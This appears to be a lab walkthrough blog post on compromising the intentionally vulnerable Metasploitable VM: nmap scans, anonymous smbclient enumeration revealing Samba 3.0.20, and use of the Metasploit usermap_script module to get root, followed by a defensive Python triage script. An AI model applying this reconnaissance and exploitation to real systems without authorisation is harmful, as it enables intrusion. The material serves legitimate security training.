The title is really interesting for me because I'm not very good at Metasploit. I will learn more about it later. OK, let's try to exploit it. Start by scanning the network with Nmap.
┌─[[email protected]]─[~/Desktop]
└──> nmap 192.168.1.* -sn -n

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-09 13:12 +0630
Nmap scan report for 192.168.1.1
Host is up (0.0011s latency).
MAC Address: 60:E3:27:BE:75:78 (Tp-link Technologies)
Nmap scan report for 192.168.1.73
Host is up (0.00036s latency).
MAC Address: 00:0C:29:99:B5:74 (VMware)
Nmap scan report for 192.168.1.74
Host is up (0.0076s latency).
MAC Address: 40:A5:EF:DC:A7:62 (Shenzhen Four Seas Global Link Network Technology)
Nmap scan report for 192.168.1.100
Host is up (0.00051s latency).
MAC Address: 34:97:F6:C3:0B:66 (Asustek Computer)
Nmap scan report for 192.168.1.101
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.27 seconds
Target IP is 192.168.1.73. 😉 Let's try another scan.
┌─[[email protected]]─[~/Desktop]
└──> nmap -sV 192.168.1.73

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-09 13:13 +0630
Nmap scan report for kioptrix3.com (192.168.1.73)
Host is up (0.0015s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.1
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:99:B5:74 (VMware)
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.79 seconds
Woo! A lot of services are running there. I always love to check port 80, but now Samba is more interesting than HTTP, so I try to connect to Samba first.
┌─[[email protected]]─[~/Desktop]
└──> smbclient -L 192.168.1.73

WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk
	IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            METASPLOITABLE
Anonymous login succeeded and we got the Samba version number. Start by searching for this version on Google.
https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script
Yeah! I found it; it can be exploited with Metasploit. Let's exploit it. Open Metasploit, use exploit/multi/samba/usermap_script, and run exploit.
Got root. Simple and easy with Metasploit! 🙂 Thanks for reading. Happy hacking.
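From the defender's side, the same two observations made above (anonymous SMB login and the Samba version in the IPC$ banner) are what a triage script should flag. The following is an added Python example, not code from the original post: it parses the smbclient -L listing shown above (embedded here as constructed sample text) and checks an smb.conf fragment (also constructed) for the non-default "username map script" option that the linked usermap_script module relies on. The affected version range used (3.0.20 through 3.0.25rc3) is taken from that module's Rapid7 documentation.

```python
import re

# Constructed sample: the smbclient -L listing from the walkthrough above.
SMBCLIENT_OUTPUT = """\
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk
	IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
"""

# Constructed smb.conf fragment with the option the usermap_script module needs.
SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   username map script = /etc/samba/scripts/mapusers.sh
"""

def parse_listing(text):
    """Return (anonymous_ok, version tuple or None, rc suffix, disk share names)."""
    anonymous_ok = "Anonymous login successful" in text
    m = re.search(r"Samba (\d+)\.(\d+)\.(\d+)(rc\d+)?", text)
    version = tuple(int(x) for x in m.groups()[:3]) if m else None
    suffix = (m.group(4) or "") if m else ""
    rows = [ln.split() for ln in text.splitlines()]
    shares = [r[0] for r in rows if len(r) >= 2 and r[1] == "Disk"]
    return anonymous_ok, version, suffix, shares

def affected_version(version, suffix):
    """Range from the module documentation: 3.0.20 through 3.0.25rc3 (3.0.25 final is fixed)."""
    if version is None:
        return False
    if (3, 0, 20) <= version <= (3, 0, 24):
        return True
    return version == (3, 0, 25) and suffix.startswith("rc")

def usermap_exposed(version, suffix, smb_conf):
    """Both conditions must hold: affected version AND 'username map script' configured."""
    has_script = re.search(r"^\s*username map script\s*=", smb_conf, re.M) is not None
    return affected_version(version, suffix) and has_script

def triage(listing, smb_conf):
    anon, version, suffix, shares = parse_listing(listing)
    return {"anonymous_login": anon, "samba_version": version, "disk_shares": shares,
            "usermap_script_exposed": usermap_exposed(version, suffix, smb_conf)}

if __name__ == "__main__":
    print(triage(SMBCLIENT_OUTPUT, SMB_CONF))
```

Removing the "username map script" line (or upgrading Samba past the affected range) flips the last flag to False, which makes the script a quick regression check after remediation.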
Note: there are many vulnerabilities to exploit on this machine.